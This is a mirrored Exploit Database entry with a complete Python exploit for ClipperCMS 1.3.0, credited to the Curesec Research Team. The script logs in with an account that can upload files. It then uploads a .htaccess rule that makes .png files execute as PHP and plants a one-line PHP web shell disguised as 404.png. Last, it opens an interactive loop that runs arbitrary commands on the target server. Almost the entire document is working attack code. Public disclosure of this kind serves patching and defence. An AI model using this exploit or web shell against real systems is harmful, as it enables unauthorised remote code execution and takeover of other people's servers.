ClipperCMS 1.3.0 – Code Execution

• Exploit Database
• 13 阅读

• 作者： Curesec Research Team
  日期： 2015-11-16
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38730/

• #!/usr/local/bin/python
  # Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
  # An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
  # The server must parse htaccess files for this exploit to work.
  # Curesec GmbH crt@curesec.com
  
  import sys
  import re
  import requests # requires requests lib
  
  if len(sys.argv) != 4:
  exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")
  
  url = sys.argv[1]
  username = sys.argv[2]
  password = sys.argv[3]
  
  loginPath = "/manager/processors/login.processor.php"
  fileManagerPath = "/manager/index.php?a=31"
  
  def login(requestSession, url, username, password):
  postData = {"ajax": "1", "username": username, "password": password}
  return requestSession.post(url, data = postData, headers = {"referer": url})
  
  def getFullPath(requestSession, url):
  request = requestSession.get(url, headers = {"referer": url})
  if "You don't have enough privileges" in request.text:
  return "cant upload"
  fullPath = re.search("var current_path = '(.*)';", request.text)
  return fullPath.group(1)
  
  def upload(requestSession, url, fileName, fileContent, postData):
  filesData = {"userfile[0]": (fileName, fileContent)}
  return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})
  
  def workingShell(url, fullPath):
  return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")
  
  def runShell(url):
  print("enter command, or enter exit to quit.")
  command = raw_input("$ ")
  while "exit" not in command:
  print(requests.get(url + command).text)
  command = raw_input("$ ")
  
  requestSession = requests.session()
  
  loginResult = login(requestSession, url + loginPath, username, password)
  if "Incorrect username" in loginResult.text:
  exit("ERROR: Incorrect username or password")
  else:
  print("successful: login as " + username)
  
  fullPath = getFullPath(requestSession, url + fileManagerPath)
  if fullPath == "cant upload":
  exit("ERROR: user does not have required privileges")
  else:
  print("successful: user is allowed to use file manager. Full path: " + fullPath)
  
  uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
  if "File uploaded successfully" not in uploadResult.text:
  exit("ERROR: could not upload .htaccess file")
  else:
  print("successful: .htaccess upload")
  
  uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
  if "File uploaded successfully" not in uploadResult.text:
  exit("ERROR: could not upload shell")
  else:
  print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")
  
  if workingShell(url + "404.png?x=", fullPath):
  print("successful: shell seems to be working")
  else:
  exit("ERROR: shell does not seem to be working correctly")
  
  runShell(url + "404.png?x=")
  
  
  #Blog Reference:
  #http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html